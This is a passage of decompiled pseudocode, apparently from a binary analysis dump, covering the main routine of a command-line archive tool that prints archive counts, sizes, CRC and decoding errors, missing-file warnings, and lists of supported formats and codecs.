						} else {
							_t1065 = E00405328(_t502);
						}
						__eflags = _t1065 - _t1075;
						 *(_t1081 - 0x20) = _t1065;
						 *(_t1081 - 4) = 4;
						 *(_t1081 - 0x130) = _t1065;
						if(_t1065 != _t1075) {
							 *((intOrPtr*)( *_t1065 + 4))(_t1065);
						}
						 *(_t1081 - 4) = 7;
						_t503 = E0041741C(_t1065); // executed
						__eflags = _t503 - _t1075;
						if(_t503 != _t1075) {
							 *(_t1081 - 0x14) = _t503;
							E0046B8F4(_t1081 - 0x14, 0x47d368);
						}
						_t504 = E0040FE22(_t1081 - 0x2b8);
						__eflags =  *(_t1065 + 0x10) - _t1075;
						 *(_t1081 - 0xd) = _t504;
						if( *(_t1065 + 0x10) == _t1075) {
							__eflags = _t504;
							if(_t504 != 0) {
								L21:
								_t812 =  *0x48aad4; // 0x48ab10
								 *(_t1081 - 0x14) = _t812;
								E0046B8F4(_t1081 - 0x14, 0x47d358);
							} else {
								__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 6;
								if( *((intOrPtr*)(_t1081 - 0x2b8)) == 6) {
									goto L21;
								} else {
									_t815 = E0040FE46(_t1081 - 0x2b8);
									__eflags = _t815;
									if(_t815 != 0) {
										goto L21;
									}
								}
							}
						}
						_push(4);
						L157();
						 *((intOrPtr*)(_t1081 - 0x60)) = 0x47a668;
						_push(_t1081 - 0x60);
						_push(_t1081 - 0x170);
						 *(_t1081 - 4) = 8;
						_t507 = E004176BE(_t1065);
						__eflags = _t507;
						if(_t507 == 0) {
							_t809 =  *0x48aad8; // 0x48aaf4
							 *(_t1081 - 0x14) = _t809;
							E0046B8F4(_t1081 - 0x14, 0x47d358);
						}
						__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 8;
						if( *((intOrPtr*)(_t1081 - 0x2b8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 7;
							if( *((intOrPtr*)(_t1081 - 0x2b8)) != 7) {
								L61:
								__eflags =  *(_t1081 - 0xd);
								if( *(_t1081 - 0xd) != 0) {
									_push(0x48);
									_t508 = E004079F2();
									 *(_t1081 - 0x14) = _t508;
									__eflags = _t508 - _t1075;
									 *(_t1081 - 4) = 0xd;
									if(_t508 == _t1075) {
										_t1066 = 0;
										__eflags = 0;
									} else {
										_t1066 = E004053AD(_t508);
									}
									__eflags = _t1066;
									 *(_t1081 - 4) = 8;
									 *(_t1081 - 0x30) = _t1066;
									if(_t1066 != 0) {
										 *((intOrPtr*)( *_t1066 + 4))(_t1066);
									}
									 *((intOrPtr*)(_t1066 + 0x40)) = _t829;
									 *((char*)(_t1066 + 0xc)) =  *((intOrPtr*)(_t1081 - 0x2a8));
									_t330 = _t1066 + 0x10; // 0x10
									 *(_t1081 - 4) = 0xe;
									E00401E26(_t330, _t1081 - 0x2a4);
									 *((intOrPtr*)(_t1066 + 0x20)) = 0;
									 *(_t1066 + 0x28) = 0;
									 *(_t1066 + 0x30) = 0;
									 *((intOrPtr*)(_t1066 + 0x38)) = 0;
									 *(_t1066 + 0x24) = 0;
									 *(_t1066 + 0x2c) = 0;
									 *(_t1066 + 0x34) = 0;
									 *((intOrPtr*)(_t1066 + 0x3c)) = 0;
									E0040347F(_t1081 - 0xc4);
									 *((char*)(_t1081 - 0xbc)) =  *((intOrPtr*)(_t1081 - 0x2a8));
									 *(_t1081 - 4) = 0xf;
									 *((intOrPtr*)(_t1081 - 0xc0)) = _t829;
									E00401E26(_t1081 - 0xb8, _t1081 - 0x2a4);
									E00404B67(_t1081 - 0xf4);
									_t517 =  *((intOrPtr*)(_t1081 - 0x2d3));
									 *(_t1081 - 4) = 0x10;
									 *((char*)(_t1081 - 0xf4)) = _t517;
									 *((char*)(_t1081 - 0xf3)) = _t517;
									_t518 = E0040FE34(_t1081 - 0x2b8);
									__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 3;
									 *(_t1081 - 0xec) = _t518;
									 *((char*)(_t1081 - 0xf1)) = _t518 & 0xffffff00 |  *((intOrPtr*)(_t1081 - 0x2b8)) == 0x00000003;
									 *((intOrPtr*)(_t1081 - 0xe8)) =  *((intOrPtr*)(_t1081 - 0x288));
									E00401E26(_t1081 - 0xe4, _t1081 - 0x294);
									 *((char*)(_t1081 - 0xf2)) =  *((intOrPtr*)(_t1081 - 0x2d0));
									 *((char*)(_t1081 - 0xf0)) =  *((intOrPtr*)(_t1081 - 0x297));
									E0040862D();
									_push(_t1081 - 0x25c);
									E00405BBA(_t1081 - 0xd8);
									 *((intOrPtr*)(_t1081 - 0x2c)) = 0;
									 *(_t1081 - 0x28) = 0;
									 *((intOrPtr*)(_t1081 - 0x24)) = 0;
									E00401E9A(_t1081 - 0x2c, 3);
									_push(_t1081 - 0xac);
									_push(_t1081 - 0x2c);
									_push(_t1066);
									_push(_t1081 - 0xc4);
									_push(_t1081 - 0xf4);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2c0)))) + 0xc);
									 *(_t1081 - 4) = 0x11;
									_push(_t1081 - 0x270);
									_push(_t1081 - 0x284);
									_t534 = E00415D31( *(_t1081 - 0x20), _t1081 - 0x60, __eflags); // executed
									__eflags =  *(_t1081 - 0x28);
									 *(_t1081 - 0x18) = _t534;
									_t1077 = E00407CCD;
									if( *(_t1081 - 0x28) != 0) {
										_push( *((intOrPtr*)(_t1081 - 0x2c)));
										E00407CEC(E00407CD5(E00407CC0(_t829, E00407CCD), "Error: "));
										__eflags =  *(_t1081 - 0x18);
										if( *(_t1081 - 0x18) == 0) {
											 *(_t1081 - 0x18) = 0x80004005;
										}
									}
									E00407CC0(_t829, _t1077);
									_t536 =  *(_t1066 + 0x24);
									_t861 =  *((intOrPtr*)(_t1066 + 0x20));
									__eflags =  *(_t1066 + 0x24);
									if(__eflags > 0) {
										L121:
										E00407CC0(E00407DED(E00407CD5(_t829, "Archives: "), __eflags, _t861, _t536), _t1077);
									} else {
										__eflags = _t861 - 1;
										if(__eflags > 0) {
											goto L121;
										}
									}
									__eflags =  *(_t1066 + 0x28) |  *(_t1066 + 0x2c);
									if(( *(_t1066 + 0x28) |  *(_t1066 + 0x2c)) != 0) {
										L136:
										__eflags =  *(_t1066 + 0x24);
										if( *(_t1066 + 0x24) > 0) {
											L138:
											E00407CC0(_t829, _t1077);
											_t543 =  *(_t1066 + 0x28);
											_t866 =  *(_t1066 + 0x2c);
											__eflags =  *(_t1066 + 0x28) |  *(_t1066 + 0x2c);
											if(__eflags != 0) {
												E00407CC0(E00407DED(E00407CD5(_t829, "Archive Errors: "), __eflags, _t543, _t866), _t1077);
											}
											_t544 =  *(_t1066 + 0x30);
											_t867 =  *(_t1066 + 0x34);
											__eflags =  *(_t1066 + 0x30) |  *(_t1066 + 0x34);
											if(__eflags != 0) {
												E00407CC0(E00407DED(E00407CD5(_t829, "Sub items Errors: "), __eflags, _t544, _t867), _t1077);
											}
										} else {
											__eflags =  *((intOrPtr*)(_t1066 + 0x20)) - 1;
											if( *((intOrPtr*)(_t1066 + 0x20)) > 1) {
												goto L138;
											}
										}
										__eflags =  *(_t1081 - 0x18);
										if( *(_t1081 - 0x18) != 0) {
											 *(_t1081 - 0x14) =  *(_t1081 - 0x18);
											E0046B8F4(_t1081 - 0x14, 0x47d368);
										}
										E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
										 *(_t1081 - 4) = 0xf;
										E00405489(_t1081 - 0xf4);
										E00407A18( *((intOrPtr*)(_t1081 - 0xb8)));
										__eflags = _t1066;
										 *(_t1081 - 4) = 8;
										if(_t1066 != 0) {
											 *((intOrPtr*)( *_t1066 + 8))(_t1066);
										}
										 *(_t1081 - 4) = 7;
										E00408604(_t1081 - 0x60);
										_t549 =  *(_t1081 - 0x20);
										 *(_t1081 - 4) = 4;
										__eflags = _t549;
										if(_t549 != 0) {
											 *((intOrPtr*)( *_t549 + 8))(_t549);
										}
										 *(_t1081 - 4) = 3;
										E00406E46(_t1081 - 0x7c);
										 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
										E00405233(_t1081 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
										 *(_t1081 - 4) = 0x12;
										goto L154;
									} else {
										__eflags =  *(_t1066 + 0x30) |  *(_t1066 + 0x34);
										if(( *(_t1066 + 0x30) |  *(_t1066 + 0x34)) != 0) {
											goto L136;
										} else {
											__eflags =  *(_t1081 - 0x18);
											if( *(_t1081 - 0x18) != 0) {
												 *(_t1081 - 0x14) =  *(_t1081 - 0x18);
												E0046B8F4(_t1081 - 0x14, 0x47d368);
											}
											_t569 =  *(_t1081 - 0x94);
											__eflags = _t569 |  *(_t1081 - 0x90);
											if(__eflags != 0) {
												_t598 = E00407DED(E00407CD5(_t829, "Folders: "), __eflags, _t569,  *(_t1081 - 0x90)); // executed
												E00407CC0(_t598, _t1077);
												_t569 =  *(_t1081 - 0x94);
											}
											__eflags =  *((intOrPtr*)(_t1081 - 0x8c)) - 1;
											if(__eflags != 0) {
												L131:
												_t571 = E00407DED(E00407CD5(_t829, "Files: "), __eflags,  *((intOrPtr*)(_t1081 - 0x8c)),  *(_t1081 - 0x88)); // executed
												E00407CC0(_t571, _t1077);
											} else {
												__eflags =  *(_t1081 - 0x88);
												if(__eflags != 0) {
													goto L131;
												} else {
													__eflags = _t569 |  *(_t1081 - 0x90);
													if(__eflags != 0) {
														goto L131;
													}
												}
											}
											_t574 = E00407DED(E00407CD5(_t829, "Size:       "), __eflags,  *((intOrPtr*)(_t1081 - 0xa4)),  *((intOrPtr*)(_t1081 - 0xa0))); // executed
											_t577 = E00407DED(E00407CD5(E00407CC0(_t574, _t1077), "Compressed: "), __eflags,  *((intOrPtr*)(_t1081 - 0x9c)),  *((intOrPtr*)(_t1081 - 0x98))); // executed
											E00407CC0(_t577, _t1077);
											__eflags =  *((char*)(_t1081 - 0x297));
											if( *((char*)(_t1081 - 0x297)) != 0) {
												E00407759( *((intOrPtr*)(_t1081 - 0x84)), _t1081 - 0x12c);
												E00407CC0(E00407CD5(E00407CD5(_t829, "CRC: "), _t1081 - 0x12c), _t1077);
											}
											E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
											 *(_t1081 - 4) = 0xf;
											E00405489(_t1081 - 0xf4);
											E00407A18( *((intOrPtr*)(_t1081 - 0xb8)));
											__eflags = _t1066;
											 *(_t1081 - 4) = 8;
											if(_t1066 != 0) {
												 *((intOrPtr*)( *_t1066 + 8))(_t1066);
											}
											goto L107;
										}
									}
									goto L110;
								} else {
									__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 6;
									if(__eflags == 0) {
										_push(_t1081 - 0x34);
										_push(_t1081 - 0x2a4);
										_push(_t1081 - 0x2a8);
										 *(_t1081 - 0x34) = _t1075;
										_push( *((intOrPtr*)(_t1081 - 0x298)));
										 *(_t1081 - 0x30) = _t1075;
										_push( *((intOrPtr*)(_t1081 - 0x2d1)));
										_t918 = _t1065;
										_push( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2c0)))) + 0xc);
										_push(_t1081 - 0x270);
										_push(_t1081 - 0x284);
										_push( *((intOrPtr*)(_t1081 - 0x2d3)));
										_t614 = E0040279E(_t918, _t1081 - 0x60, __eflags);
										__eflags =  *(_t1081 - 0x30) - _t1075;
										if(__eflags > 0) {
											L151:
											E00407DED(E00407CD5(E00407CC0(0x490ab8, E00407CCD), "Errors: "), __eflags,  *(_t1081 - 0x34),  *(_t1081 - 0x30));
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											_t471 = _t1081 - 4;
											 *_t471 =  *(_t1081 - 4) & 0x00000000;
											__eflags =  *_t471;
											E00405233(_t1081 - 0x2d8,  *_t471);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0x13;
											goto L154;
										} else {
											__eflags =  *(_t1081 - 0x34) - _t1075;
											if(__eflags <= 0) {
												__eflags = _t614 - _t1075;
												if(_t614 == _t1075) {
													goto L107;
												} else {
													 *(_t1081 - 0x14) = _t614;
													E0046B8F4(_t1081 - 0x14, 0x47d368);
													_t625 = _t918;
													__eflags = 0;
													 *((intOrPtr*)(_t625 + 4)) = 0;
													 *((intOrPtr*)(_t625 + 8)) = 0;
													 *((intOrPtr*)(_t625 + 0xc)) = 0;
													 *((intOrPtr*)(_t625 + 0x10)) =  *((intOrPtr*)(_t1084 + 4));
													 *_t625 = 0x47a670;
													return _t625;
												}
											} else {
												goto L151;
											}
										}
									} else {
										_t626 = E0040FE46(_t1081 - 0x2b8);
										__eflags = _t626;
										if(_t626 == 0) {
											E0040519B(_t829);
											goto L107;
										} else {
											__eflags =  *((char*)(_t1081 - 0x1c0));
											if( *((char*)(_t1081 - 0x1c0)) != 0) {
												__eflags =  *((intOrPtr*)(_t1081 - 0x1b8)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x1b8)) == _t1075) {
													E00403593(_t1081 - 0x1bc,  *0x48aadc);
												}
											}
											E0040347F(_t1081 - 0x148);
											__eflags =  *((char*)(_t1081 - 0x2a8));
											 *(_t1081 - 4) = 0x14;
											 *((intOrPtr*)(_t1081 - 0x144)) = _t829;
											if( *((char*)(_t1081 - 0x2a8)) == 0) {
												L70:
												_t179 = _t1081 - 0xd;
												 *_t179 =  *(_t1081 - 0xd) & 0x00000000;
												__eflags =  *_t179;
											} else {
												__eflags =  *((intOrPtr*)(_t1081 - 0x2a0)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x2a0)) == _t1075) {
													goto L70;
												} else {
													 *(_t1081 - 0xd) = 1;
												}
											}
											 *((char*)(_t1081 - 0x140)) =  *(_t1081 - 0xd);
											E00401E26(_t1081 - 0x13c, _t1081 - 0x2a4);
											E0040502A(_t1081 - 0x378);
											__eflags =  *((char*)(_t1081 - 0x2a8));
											 *((char*)(_t1081 - 0x340)) =  *((intOrPtr*)(_t1081 - 0x164));
											 *(_t1081 - 4) = 0x15;
											 *((char*)(_t1081 - 0x33e)) =  *(_t1081 - 0xd);
											if( *((char*)(_t1081 - 0x2a8)) == 0) {
												L74:
												_t194 = _t1081 - 0x330;
												 *_t194 =  *(_t1081 - 0x330) & 0x00000000;
												__eflags =  *_t194;
											} else {
												__eflags =  *((intOrPtr*)(_t1081 - 0x2a0)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x2a0)) != _t1075) {
													goto L74;
												} else {
													 *(_t1081 - 0x330) = 1;
												}
											}
											E00401E26(_t1081 - 0x33c, _t1081 - 0x2a4);
											 *((char*)(_t1081 - 0x33f)) =  *((intOrPtr*)(_t1081 - 0x1a0));
											E00405172(_t1081 - 0x378, _t829);
											E00404BAF(_t1081 - 0x11c);
											_push(_t1081 - 0x2b4);
											_push(_t1081 - 0x60);
											_push(_t1065);
											 *(_t1081 - 4) = 0x16;
											_t642 = E00419B56(_t1081 - 0x248, _t1049);
											__eflags = _t642;
											if(_t642 == 0) {
												_t725 =  *0x48aad8; // 0x48aaf4
												 *(_t1081 - 0x14) = _t725;
												E0046B8F4(_t1081 - 0x14, 0x47d358);
											}
											_t1057 = _t1081 - 0x2cc;
											_push(_t1081 - 0x378);
											_push(_t1081 - 0x148);
											_push(_t1081 - 0x11c);
											_push(_t1081 - 0x248);
											_t647 = E00419FDE(_t1065, _t1081 - 0x2cc);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
											__eflags =  *(_t1081 - 0x2fc);
											 *(_t1081 - 0x14) = _t647;
											_t1079 = E00407CCD;
											if( *(_t1081 - 0x2fc) > 0) {
												E00407CC0(_t829, E00407CCD);
												E00407CC0(E00407CC0(E00407CD5(_t829, "WARNINGS for files:"), E00407CCD), E00407CCD);
												_t706 =  *(_t1081 - 0x2fc);
												_t1070 = 0;
												__eflags = _t706;
												 *(_t1081 - 0x1c) = _t706;
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(E00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2f8)) + _t1070 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2e4)) + _t1070 * 4));
														_t720 = E00404B09(_t1081 - 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2e4)) + _t1070 * 4)));
														_push(E00407CCD);
														 *(_t1081 - 4) = 0x17;
														E00407CC0(E00407CEC(_t829),  *_t720);
														 *(_t1081 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
														_t1070 = _t1070 + 1;
														__eflags = _t1070 -  *(_t1081 - 0x1c);
													} while (__eflags < 0);
												}
												E00407CC0(E00407CD5(_t829, "----------------"), _t1079);
												E00407CD5(E00407DC6(E00407CD5(_t829, "WARNING: Cannot find "), _t1057, __eflags,  *(_t1081 - 0x1c)), " file");
												_t1071 = 1;
												__eflags =  *(_t1081 - 0x1c) - _t1071;
												if( *(_t1081 - 0x1c) > _t1071) {
													E00407CD5(_t829, "s");
												}
												E00407CC0(_t829, _t1079);
												 *(_t1081 - 0x18) = _t1071;
												_t1065 =  *(_t1081 - 0x20);
											}
											__eflags =  *(_t1081 - 0x14);
											if( *(_t1081 - 0x14) != 0) {
												_t1065 = 0;
												 *((intOrPtr*)(_t1081 - 0x38)) = 0;
												 *(_t1081 - 0x34) = 0;
												 *(_t1081 - 0x30) = 0;
												E00401E9A(_t1081 - 0x38, 3);
												__eflags =  *(_t1081 - 0xfc);
												 *(_t1081 - 4) = 0x18;
												_t1079 = "\n";
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x100);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *((intOrPtr*)(_t1081 - 0x114)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x118);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *((intOrPtr*)(_t1081 - 0x108)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x10c);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												_t1057 =  *((intOrPtr*)(_t1081 - 0x11c));
												__eflags =  *((intOrPtr*)(_t1081 - 0x11c)) - _t1065;
												if( *((intOrPtr*)(_t1081 - 0x11c)) != _t1065) {
													_t689 = E00404B09(_t1081 - 0x2c, _t1057);
													 *(_t1081 - 4) = 0x19;
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t689);
													 *(_t1081 - 4) = 0x18;
													E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *(_t1081 - 0x34) - _t1065;
												if( *(_t1081 - 0x34) != _t1065) {
													_push( *((intOrPtr*)(_t1081 - 0x38)));
													_push(L"\nError:\n");
													E00407CEC(E00407CEC(_t829));
												}
												E0046B8F4(_t1081 - 0x14, 0x47d368);
											}
											_t648 =  *(_t1081 - 0x324);
											__eflags = _t648;
											 *(_t1081 - 0x1c) = _t648;
											if(_t648 != 0) {
												E00407CC0(_t829, _t1079);
												E00407CC0(E00407CC0(E00407CD5(_t829, "WARNINGS for files:"), _t1079), _t1079);
												_t1068 = 0;
												__eflags =  *(_t1081 - 0x1c);
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(E00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x320)) + _t1068 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x30c)) + _t1068 * 4));
														_t676 = E00404B09(_t1081 - 0x128,  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x30c)) + _t1068 * 4)));
														_push(_t1079);
														 *(_t1081 - 4) = 0x1a;
														E00407CC0(E00407CEC(_t829),  *_t676);
														 *(_t1081 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1081 - 0x128)));
														_t1068 = _t1068 + 1;
														__eflags = _t1068 -  *(_t1081 - 0x1c);
													} while (__eflags < 0);
												}
												E00407CC0(E00407CD5(_t829, "----------------"), _t1079);
												E00407CD5(E00407DC6(E00407CD5(_t829, "WARNING: Cannot open "), _t1057, __eflags,  *(_t1081 - 0x1c)), " file");
												_t1069 = 1;
												__eflags =  *(_t1081 - 0x1c) - _t1069;
												if( *(_t1081 - 0x1c) > _t1069) {
													E00407CD5(_t829, "s");
												}
												E00407CC0(_t829, _t1079);
												 *(_t1081 - 0x18) = _t1069;
												_t1065 =  *(_t1081 - 0x20);
											} else {
												__eflags =  *(_t1081 - 0x2fc) - _t648;
												if( *(_t1081 - 0x2fc) == _t648) {
													E00407CC0(E00407CD5(_t829,  *0x48aacc), _t1079);
												}
											}
											 *(_t1081 - 4) = 0x15;
											E004054DE(_t1081 - 0x11c);
											 *(_t1081 - 4) = 0x14;
											E004050D8(_t1081 - 0x378);
											E00407A18( *((intOrPtr*)(_t1081 - 0x13c)));
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065;
											 *(_t1081 - 4) = 4;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
											E00405233(_t1081 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0x1b;
											E0040862D();
											 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
											E00408604(_t1081 - 0x4c);
											_t554 =  *(_t1081 - 0x18);
										}
										goto L110;
									}
								}
							} else {
								_t729 = E0040807A(L"CRC");
								_t133 = _t829 + 4; // 0x48de00
								_t996 =  *_t133;
								_t1049 =  *((intOrPtr*)(_t1081 - 0x160));
								_push( *((intOrPtr*)(_t1081 - 0x158)));
								__eflags = _t729 - _t1075;
								_push( *((intOrPtr*)(_t1081 - 0x15c)));
								if(__eflags != 0) {
									L55:
									_t730 = E004012BB(_t996, _t1049, __eflags);
									__eflags = _t730 - _t1075;
									if(_t730 == _t1075) {
										goto L107;
									} else {
										__eflags = _t730 - 1;
										if(_t730 != 1) {
											 *(_t1081 - 0x14) = _t730;
											E0046B8F4(_t1081 - 0x14, 0x47d368);
											goto L61;
										} else {
											E00407CD5(_t829, "\nDecoding Error\n");
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
											E00405233(_t1081 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0xc;
											L154:
											E0040862D();
											 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
											E00408604(_t1081 - 0x4c);
											_t554 = 2;
											goto L110;
										}
									}
								} else {
									_t739 = E00401679(_t996, _t1049, __eflags);
									__eflags = _t739 - _t1075;
									if(_t739 == _t1075) {
										L107:
										 *(_t1081 - 4) = 7;
										E00408604(_t1081 - 0x60);
										_t583 =  *(_t1081 - 0x20);
										 *(_t1081 - 4) = 4;
										__eflags = _t583;
										if(_t583 != 0) {
											 *((intOrPtr*)( *_t583 + 8))(_t583);
										}
										 *(_t1081 - 4) = 3;
										E00406E46(_t1081 - 0x7c);
										 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
										E00405233(_t1081 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
										 *(_t1081 - 4) = 0x1c;
										E0040862D();
										 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
										E00408604(_t1081 - 0x4c);
										_t554 = 0;
										__eflags = 0;
										goto L110;
									} else {
										__eflags = _t739 - 1;
										if(__eflags != 0) {
											 *(_t1081 - 0x14) = _t739;
											E0046B8F4(_t1081 - 0x14, 0x47d368);
											goto L55;
										} else {
											E00407CD5(_t829, "\nCRC Error\n");
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											_t143 = _t1081 - 4;
											 *_t143 =  *(_t1081 - 4) & 0x00000000;
											__eflags =  *_t143;
											E00405233(_t1081 - 0x2d8,  *_t143);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0xb;
											_t1075 = 2;
											goto L53;
										}
									}
								}
							}
						} else {
							_t1080 = E00407CCD;
							E00407CC0(E00407CD5(E00407CC0(_t829, E00407CCD), "Formats:"), E00407CCD);
							 *(_t1081 - 0x1c) =  *(_t1081 - 0x1c) & 0x00000000;
							__eflags =  *(_t1065 + 0x10);
							if( *(_t1065 + 0x10) > 0) {
								do {
									_t1073 =  *((intOrPtr*)( *((intOrPtr*)( *(_t1081 - 0x20) + 0x14)) +  *(_t1081 - 0x1c) * 4));
									E00407CD5(_t829, "  ");
									_t764 = E00407DAD(_t829, 0x20);
									__eflags =  *_t1073;
									_t769 = E00407DAD(_t829, ((_t764 & 0xffffff00 |  *_t1073 == 0x00000000) - 0x00000001 & 0x00000023) + 0x20);
									__eflags =  *((char*)(_t1073 + 0x38));
									E00407DAD(_t829, ((_t769 & 0xffffff00 |  *((char*)(_t1073 + 0x38)) == 0x00000000) - 0x00000001 & 0x0000002b) + 0x20);
									E00407CD5(_t829, "  ");
									_t1059 = _t1073 + 0xc;
									E00405208(_t829, _t1073 + 0xc, 6);
									E00407CD5(_t829, "  ");
									 *((intOrPtr*)(_t1081 - 0x2c)) = 0;
									 *(_t1081 - 0x28) = 0;
									 *((intOrPtr*)(_t1081 - 0x24)) = 0;
									E00401E9A(_t1081 - 0x2c, 3);
									 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
									__eflags =  *(_t1073 + 0x20);
									 *(_t1081 - 4) = 9;
									if(__eflags > 0) {
										do {
											 *(_t1081 - 0x30) =  *( *((intOrPtr*)(_t1073 + 0x24)) +  *(_t1081 - 0x18) * 4);
											E00405529(_t1081 - 0x2c, _t1059, __eflags,  *( *((intOrPtr*)(_t1073 + 0x24)) +  *(_t1081 - 0x18) * 4));
											__eflags =  *( *(_t1081 - 0x30) + 0x10);
											if(__eflags != 0) {
												E004035F2(_t1081 - 0x2c, _t1059, L" (");
												__eflags =  *(_t1081 - 0x30) + 0xc;
												E00405529(_t1081 - 0x2c, _t1059, __eflags,  *(_t1081 - 0x30) + 0xc);
												E004054FE(_t1081 - 0x2c, _t1059, __eflags, 0x29);
											}
											E004054FE(_t1081 - 0x2c, _t1059, __eflags, 0x20);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) + 1;
											__eflags =  *(_t1081 - 0x18) -  *(_t1073 + 0x20);
										} while (__eflags < 0);
									}
									E00405208(_t829, _t1081 - 0x2c, 0xe);
									E00407CD5(_t829, "  ");
									 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
									__eflags =  *(_t1073 + 0x30);
									if( *(_t1073 + 0x30) > 0) {
										do {
											_t786 =  *((intOrPtr*)( *((intOrPtr*)(_t1073 + 0x34)) +  *(_t1081 - 0x18)));
											__eflags = _t786 - 0x20;
											 *(_t1081 - 0x14) = _t786;
											if(_t786 <= 0x20) {
												L34:
												_t787 = _t786 >> 4;
												__eflags = _t787 - 0xa;
												_t788 = _t787 & 0x000000ff;
												if(_t787 >= 0xa) {
													_t789 = _t788 + 0x37;
													__eflags = _t788 + 0x37;
												} else {
													_t789 = _t788 + 0x30;
												}
												E00407DAD(_t829, _t789);
												_t792 =  *(_t1081 - 0x14) & 0x0000000f;
												__eflags = _t792 - 0xa;
												_t793 = _t792 & 0x000000ff;
												if(_t792 >= 0xa) {
													_t794 = _t793 + 0x37;
													__eflags = _t794;
												} else {
													_t794 = _t793 + 0x30;
												}
												_push(_t794);
											} else {
												__eflags = _t786 - 0x80;
												if(_t786 >= 0x80) {
													goto L34;
												} else {
													_push( *(_t1081 - 0x14));
												}
											}
											E00407DAD(_t829);
											E00407DAD(_t829, 0x20);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) + 1;
											__eflags =  *(_t1081 - 0x18) -  *(_t1073 + 0x30);
										} while ( *(_t1081 - 0x18) <  *(_t1073 + 0x30));
									}
									E00407CC0(_t829, _t1080);
									 *(_t1081 - 4) = 8;
									E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
									 *(_t1081 - 0x1c) =  *(_t1081 - 0x1c) + 1;
									_t784 =  *(_t1081 - 0x20);
									__eflags =  *(_t1081 - 0x1c) -  *((intOrPtr*)(_t784 + 0x10));
								} while ( *(_t1081 - 0x1c) <  *((intOrPtr*)(_t784 + 0x10)));
							}
							E00407CC0(E00407CD5(E00407CC0(_t829, _t1080), "Codecs:"), _t1080);
							 *(_t1081 - 4) = 7;
							E00408604(_t1081 - 0x60);
							_t757 =  *(_t1081 - 0x20);
							 *(_t1081 - 4) = 4;
							__eflags = _t757;
